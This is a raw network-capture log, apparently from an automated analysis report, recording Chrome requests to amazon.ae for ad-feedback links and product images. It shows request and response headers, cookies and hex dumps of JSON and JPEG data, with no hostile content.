                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1598OUTGET /af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_desktop-ad-center-1_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22slotName%22%3A%22desktop-ad-center-1%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DROAZJXecL-vBvC-Yjxkq97kAAAGRdjK03wMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICDFIFP4%22%2C%22adCreativeId%22%3A%22577653937781864011%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D HTTP/1.1
                                                                                                                                                                                                                                                                      Host: www.amazon.ae
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      device-memory: 8
                                                                                                                                                                                                                                                                      rtt: 250
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-viewport-width: 1280
                                                                                                                                                                                                                                                                      sec-ch-device-memory: 8
                                                                                                                                                                                                                                                                      viewport-width: 1280
                                                                                                                                                                                                                                                                      sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                      dpr: 1
                                                                                                                                                                                                                                                                      downlink: 10
                                                                                                                                                                                                                                                                      sec-ch-dpr: 1
                                                                                                                                                                                                                                                                      ect: 4g
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      Cookie: session-id=261-8635865-4706955; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=260-8031893-3804011; csm-hit=tb:s-APAVCQJMFK78QJEV1PMZ|1724264920834&t:1724264922221&adb:adblk_no
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC1533INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: application/json;charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:46 GMT
                                                                                                                                                                                                                                                                      Vary: Content-Type,Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                      x-amz-rid: VNNTXQ63SVJGXG9GJP52
                                                                                                                                                                                                                                                                      set-cookie: session-token=wUll0F4no7l9tPliyGKgLvlAAEELjfHKcJFzjW0ynq92lsg+mH223NtULYWESn2Mot8TG+uFHnE7n3w5VDki+yw05IIEV7ag/ggyw/YwGpMtnRbuMhFwzmUXe1lN0pukOaZb8Ih2JkZX1eXgZEKdKrDfkxF4guSmgyZNH6+9UULqN+0M8JltmEFqKKbiq149qIYHdGSMYteIDAV6KR/MM+XSRtI9JoamYzz/wm7syFkdpLE83Bh7Zl/MyCLwPiYE1VHyDDdBuun8drPYkCCGehL5uvaMNftgqo8GtBe6DKITy/jN+mPTvaEs15Vf3dQbiBG6BbttM0kNfgmvfMe/9If5U20+f6+p; Domain=.amazon.ae; Expires=Thu, 21-Aug-2025 18:28:46 GMT; Path=/; Secure
                                                                                                                                                                                                                                                                      Accept-CH-Lifetime: 86400
                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                      content-security-policy-report-only: default-src 'self' blob: https: data: mediastream: 'unsafe-eval' 'unsafe-inline';report-uri https://metrics.media-amazon.com/
                                                                                                                                                                                                                                                                      Accept-CH: ect,rtt,downlink,device-memory,sec-ch-device-memory,viewport-width,sec-ch-viewport-width,dpr,sec-ch-dpr,sec-ch-ua-platform,sec-ch-ua-platform-version
                                                                                                                                                                                                                                                                      X-XSS-Protection: 1;
                                                                                                                                                                                                                                                                      Content-Security-Policy: upgrade-insecure-requests;report-uri https://metrics.media-amazon.com/
                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
                                                                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                      Via: 1.1 34fdfb7c7c11559df7e622af2b62f5ca.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA56-P4
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: 0JiZAyQ708ETeh-0CdVzr0eh9FawqNi84VGrZnaebwjwdzqNMCEGog==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC4892INData Raw: 31 33 31 34 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 68 74 6d 6c 22 3a 22 3c 61 20 64 61 74 61 2d 61 2d 6d 6f 64 61 6c 3d 5c 22 7b 26 71 75 6f 74 3b 75 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 2f 61 66 2f 66 65 65 64 62 61 63 6b 2d 66 6f 72 6d 3f 70 6c 3d 25 37 42 25 32 32 61 64 50 6c 61 63 65 6d 65 6e 74 4d 65 74 61 44 61 74 61 25 32 32 25 33 41 25 37 42 25 32 32 61 64 45 6c 65 6d 65 6e 74 49 64 25 32 32 25 33 41 25 32 32 61 70 65 5f 47 61 74 65 77 61 79 5f 64 65 73 6b 74 6f 70 2d 61 64 2d 63 65 6e 74 65 72 2d 31 5f 64 65 73 6b 74 6f 70 5f 70 6c 61 63 65 6d 65 6e 74 25 32 32 25 32 43 25 32 32 70 61 67 65 54 79 70 65 25 32 32 25 33 41 25 32 32 47 61 74 65 77 61 79 25 32 32 25 32 43 25 32 32 70 61 67 65 55 72 6c 25 32 32 25 33 41 25 32 32
                                                                                                                                                                                                                                                                      Data Ascii: 1314{"status":"ok","html":"<a data-a-modal=\"{&quot;url&quot;:&quot;/af/feedback-form?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_desktop-ad-center-1_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      116192.168.2.549847151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC611OUTGET /images/I/31R49MniA9L._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC656INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 5108
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 4b942d3e-992a-442c-a497-d28e186b0fe7
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Wed, 17 Jul 2024 11:01:40 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Expires: Mon, 15 Aug 2044 14:43:32 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 98640
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:46 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kcgs7200075-IAD, cache-nyc-kteb1890097-NYC
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 05 03 04 06 07 08 01 02 09 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 03 04 05 02 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ec b0 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"5
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC1378INData Raw: 92 25 12 ab 20 de 8b 83 d5 69 35 9c 5c 0d 71 e7 ae a8 e2 66 7b d3 46 cf f8 a1 d2 e4 7f ce 0a 38 e0 f8 d9 3a 3c c1 69 a6 bd 3c cf 85 ce 16 4f 6a 21 32 a1 ed 42 b4 a3 50 5d e7 78 b7 97 59 2c 95 d4 92 08 81 2e c5 f5 f2 5a 0d 27 4e e0 23 c7 9f 5a aa dc 40 53 42 68 74 86 cd 83 4a 71 fa 90 d3 32 1f 86 2a ca ca cb 5a a7 36 6c cc 6c 82 66 35 e1 3b 65 d5 d1 28 39 07 20 55 4e a2 d8 bd a2 8b 46 9a bc 89 2a 29 e9 a3 a6 6e 31 f3 eb 30 4f 51 3b 5a d8 74 7b 7d 58 a1 6c 62 cd c5 59 59 5b 6c 91 89 1a 5a 69 ef 04 92 40 e7 a7 2b ab a0 53 90 72 74 c2 31 77 1a 89 6b 1d bb 87 4a d0 59 4a 33 97 b4 e8 96 0b 15 65 6e 5d 6e 02 31 9d 99 87 80 e1 7b 27 2b ac 95 d4 b5 61 9f 1a 0d 22 7a ef 7b e9 28 a2 a3 6e 31 f7 ad cd 34 42 56 b9 86 2b c4 e7 c2 5c af 75 74 e9 03 7c c6 d9 6b 1d 84 7a
                                                                                                                                                                                                                                                                      Data Ascii: % i5\qf{F8:<i<Oj!2BP]xY,.Z'N#Z@SBhtJq2*Z6llf5;e(9 UNF*)n10OQ;Zt{}XlbYY[lZi@+Srt1wkJYJ3en]n1{'+a"z{(n14BV+\ut|kz
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC1378INData Raw: c7 6b 46 6f 6f df 01 68 99 29 aa 3c e7 f4 14 16 4a d3 2f 8e 45 b6 5e 2e b6 1a 3e 45 5b 1b f3 93 31 9e 37 38 b2 2d fa d4 b9 33 2d cc 4d c2 5b 21 3e dd 55 7c 8a bb 5d ae 45 90 a8 b2 b0 c8 20 f4 78 3d 19 7c f1 72 0d 4a 68 d2 c9 3c 27 12 7a 3c 2e f9 82 c4 72 ec f5 f3 71 4d cc 8f 21 ad 80 b3 28 f3 7c 11 92 99 d3 d2 e5 69 db 7a 6f ea 43 90 99 25 02 6c 08 4e dc 91 a7 de fe 02 73 55 f2 bc b8 48 db 7b 95 4a 69 74 9f e4 21 73 04 e1 e4 c4 e5 3d 53 87 aa 30 dd 68 04 6b a2 a1 ce fd 84 70 be ee 77 2a 18 48 d8 27 b2 76 18 75 4d 32 73 06 5a bd ff 00 28 e4 5d fa 2a f9 d8 67 7b d4 34 aa 23 e8 4e 3a 87 b0 bf a3 a4 21 7f 0d 33 2c 88 48 06 e0 43 31 ed 32 bf 1d 79 fc b3 da df 74 e6 50 98 95 81 19 db 2a c9 3d e8 3e c8 51 78 0f 98 9b 0a 46 42 2d 84 ad 31 97 8b 85 f2 d8 ce e4 c6
                                                                                                                                                                                                                                                                      Data Ascii: kFooh)<J/E^.>E[178-3-M[!>U|]E x=|rJh<'z<.rqM!(|izoC%lNsUH{Jit!s=S0hkpw*H'vuM2sZ(]*g{4#N:!3,HC12ytP*=>QxFB-1
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC974INData Raw: 4c 03 98 bd 25 06 16 f3 60 52 45 9d 4a 27 8b 8c 44 bb ca 7f 68 98 88 42 97 47 59 42 9d 49 96 e3 49 63 69 6c c4 1a 99 ed 1d 30 4b a1 3d 81 dd a2 2c aa ea 31 3a d5 d4 6c 97 62 5c 0d 88 89 cc 71 51 86 d8 1d d7 5f da 9e 7f 4c 61 b8 9b 18 47 df 2a cf 52 e5 b9 55 6d 9d fe 12 81 e0 6b a1 0c d5 71 af 20 84 ea 66 11 30 61 b3 63 c4 f6 42 9e 04 b9 d4 f7 21 9b 27 9f e6 54 e9 8f 88 18 0b 87 8d 41 01 41 39 70 6a fc fd 36 83 45 e5 89 df 54 bd 91 d1 1e 09 ac 3c 19 81 ea f9 42 7e ef 0f a7 59 1c 79 39 87 ef b3 8a a8 d8 5f bb e8 af 46 a3 9e 2a 9f 20 c3 5e 96 c7 ad 5d e0 12 47 41 35 21 1b 1d 4e 69 c7 3f 77 22 26 b9 87 a5 91 5c e2 c8 d5 fa ab 8c 7b 45 91 c1 38 8c ab 36 28 36 70 c6 cb 1e eb 27 9a 3e 8f 58 3b 6f 4d 0d d6 08 cf de e6 ad bc 1a 25 5c 54 4f 46 a2 68 48 f9 63 a6 66
                                                                                                                                                                                                                                                                      Data Ascii: L%`REJ'DhBGYBIIcil0K=,1:lb\qQ_LaG*RUmkq f0acB!'TAA9pj6ET<B~Yy9_F* ^]GA5!Ni?w"&\{E86(6p'>X;oM%\TOFhHcf


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      117192.168.2.54983952.222.236.764432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC1574OUTGET /af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_right-7_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22slotName%22%3A%22right-7%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DREz88vUB1bF630ZNVKUQFtQAAAGRdjK03wMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICD-zm4e%22%2C%22adCreativeId%22%3A%22579371395698106697%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D HTTP/1.1
                                                                                                                                                                                                                                                                      Host: www.amazon.ae
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      device-memory: 8
                                                                                                                                                                                                                                                                      rtt: 250
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-viewport-width: 1280
                                                                                                                                                                                                                                                                      sec-ch-device-memory: 8
                                                                                                                                                                                                                                                                      viewport-width: 1280
                                                                                                                                                                                                                                                                      sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                      dpr: 1
                                                                                                                                                                                                                                                                      downlink: 10
                                                                                                                                                                                                                                                                      sec-ch-dpr: 1
                                                                                                                                                                                                                                                                      ect: 4g
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      Cookie: session-id=261-8635865-4706955; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=260-8031893-3804011; csm-hit=tb:s-APAVCQJMFK78QJEV1PMZ|1724264920834&t:1724264922221&adb:adblk_no
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC1533INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: application/json;charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:46 GMT
                                                                                                                                                                                                                                                                      Vary: Content-Type,Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                      x-amz-rid: 4Z8K573R2JHAJNMFA9CM
                                                                                                                                                                                                                                                                      set-cookie: session-token=iEWMYEFKrtJIow/CNVuOz9FUzjcviv4X0ndqos/Z/EndZGMUPIqV/cGu0xyhHpymMzemV8FzzfcoPADcJtxlyqX92z9iptXKr7Ms1mulHo/qBujYJmsju/RRcnb/s2XPz1nDckf2AVkM7phlRS6PK0A8Oyz8zrBSfywK4K42pHS6LfHMBPPWnR7dE/8YgkCddjRb8f8+hproby/VGgI8K8LnWJVX3JXL79eqf88m0ziYgOsvjw8MkYnWie0RnY4FwNp1tJATQeWJi10aPKwLq+9IR2ER+0budc5NnOCUOKiuDhl6E9x/w1jDuk96dSs86r5dxrWNLvn3N15ReTLbBABXtREiOpP9; Domain=.amazon.ae; Expires=Thu, 21-Aug-2025 18:28:46 GMT; Path=/; Secure
                                                                                                                                                                                                                                                                      content-security-policy-report-only: default-src 'self' blob: https: data: mediastream: 'unsafe-eval' 'unsafe-inline';report-uri https://metrics.media-amazon.com/
                                                                                                                                                                                                                                                                      Accept-CH-Lifetime: 86400
                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                      Content-Security-Policy: upgrade-insecure-requests;report-uri https://metrics.media-amazon.com/
                                                                                                                                                                                                                                                                      Accept-CH: ect,rtt,downlink,device-memory,sec-ch-device-memory,viewport-width,sec-ch-viewport-width,dpr,sec-ch-dpr,sec-ch-ua-platform,sec-ch-ua-platform-version
                                                                                                                                                                                                                                                                      X-XSS-Protection: 1;
                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
                                                                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                      Via: 1.1 a823be133adad65df6d3bf471a742792.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA56-P4
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: odm_31LqWA9Qt1vUxj3vm4IIWMJ-2VmGmhbmMv7s0iAXIxTLLMv4jA==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC4757INData Raw: 31 32 38 64 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 68 74 6d 6c 22 3a 22 3c 61 20 64 61 74 61 2d 61 2d 6d 6f 64 61 6c 3d 5c 22 7b 26 71 75 6f 74 3b 75 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 2f 61 66 2f 66 65 65 64 62 61 63 6b 2d 66 6f 72 6d 3f 70 6c 3d 25 37 42 25 32 32 61 64 50 6c 61 63 65 6d 65 6e 74 4d 65 74 61 44 61 74 61 25 32 32 25 33 41 25 37 42 25 32 32 61 64 45 6c 65 6d 65 6e 74 49 64 25 32 32 25 33 41 25 32 32 61 70 65 5f 47 61 74 65 77 61 79 5f 72 69 67 68 74 2d 37 5f 64 65 73 6b 74 6f 70 5f 70 6c 61 63 65 6d 65 6e 74 25 32 32 25 32 43 25 32 32 70 61 67 65 54 79 70 65 25 32 32 25 33 41 25 32 32 47 61 74 65 77 61 79 25 32 32 25 32 43 25 32 32 70 61 67 65 55 72 6c 25 32 32 25 33 41 25 32 32 61 48 52 30 63 48 4d 36 4c 79 39 33
                                                                                                                                                                                                                                                                      Data Ascii: 128d{"status":"ok","html":"<a data-a-modal=\"{&quot;url&quot;:&quot;/af/feedback-form?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_right-7_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC20INData Raw: 66 0d 0a 75 6d 65 6e 74 2c 20 4d 61 74 68 29 3b 22 7d 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: fument, Math);"}
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      118192.168.2.549848151.101.193.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC458OUTGET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1746405_3944616_186x116_1X_ar_AE._SY116_CB567106849_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 4485
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 4d121dae-eb8d-4add-acab-86babb0376d8
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Fri, 16 Aug 2024 08:05:34 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Expires: Thu, 11 Aug 2044 11:53:59 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 455686
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:46 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kiad7000088-IAD, cache-ewr-kewr1740061-EWR
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 03 03 03 06 04 06 06 06 06 08 0d 09 09 08 09 09 10 0c 09 0c 0b 0f 09 0b 0b 0f 0b 0f 0f 0b 0d 0f 0d 0d 11 0f 0d 0d 0f 11 0d 0f 10 17 10 12 10 14 11 10 15 10 17 10 17 16 16 17 19 1a 17 0f 19 23 01 06 06 03 06 06 06 08 06 06 0d 15 0f 09 11 16 12 08 10 1a 16 1a 11 16 17 16 16 10 1d 16 1a 15 16 0d 17 16 11 14 14 11 11 12 10 12 16 11 17 17 17 09 10 17 15 0f 1f 10 11 0f 16 15 19 14 0f 17 1c ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 a8 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 06 08 04 05 07 09 03 10 00 01 03 02 03 05 04 05 09 07 04 03 00 00 00 00 01 00 02 03 04 11 05 21 31 06 07 12 13 41 22 32 51 61 08 14 71 81 b1 23 33 42 52 53 62 91 92 a1 15 17
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#t"!1A"2Qaq#3BRSb
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC1378INData Raw: 33 5f db 37 c7 7f 65 4e 25 8a ae 56 c6 c7 b6 57 36 31 66 b5 c1 e5 ac 07 50 d0 72 68 3e 49 ef 96 b9 f2 b6 67 19 8c 8d b7 0c 84 bc bc 5b 4b 3b 51 6e 8a e1 f1 15 a5 ac 80 b0 f1 0d 09 55 ea 31 c9 e1 67 58 c0 4f 8e be 09 c3 a5 76 9d 0d 38 e7 cf c7 e8 ab 0c 58 a6 2d 10 e1 64 f5 2d 04 93 61 24 a0 5c 9b 93 91 d4 9c c9 ea 99 0e 21 8a 42 c3 1c 73 54 35 86 fd 96 be 46 b7 3c ce 40 db 33 99 f1 5d c2 5d b4 c2 62 c4 63 c2 1d 5d 17 ae c8 0f 0d 2f 30 19 4d 85 f4 e9 90 d0 a9 3f 11 55 24 e3 5a e8 72 99 58 e6 dc 5c 5c 91 a7 96 9b 24 f8 97 09 fe 33 7c 79 7f ca aa ec a7 a8 8d c1 ed 63 c3 81 b8 70 0e 04 11 9d c1 d6 eb 3e b2 b7 12 ac 73 1f 3c 93 48 63 ee 17 39 ee 2d f3 17 d0 f9 ab 34 1c 82 e5 00 e3 d9 9a 08 0d b0 df 72 a4 3d 29 35 c4 39 d4 e0 9d 86 be ca b1 57 d4 d7 d7 96 9a 97
                                                                                                                                                                                                                                                                      Data Ascii: 3_7eN%VW61fPrh>Ig[K;QnU1gXOv8X-d-a$\!BsT5F<@3]]bc]/0M?U$ZrX\\$3|ycp>s<Hc9-4r=)59W
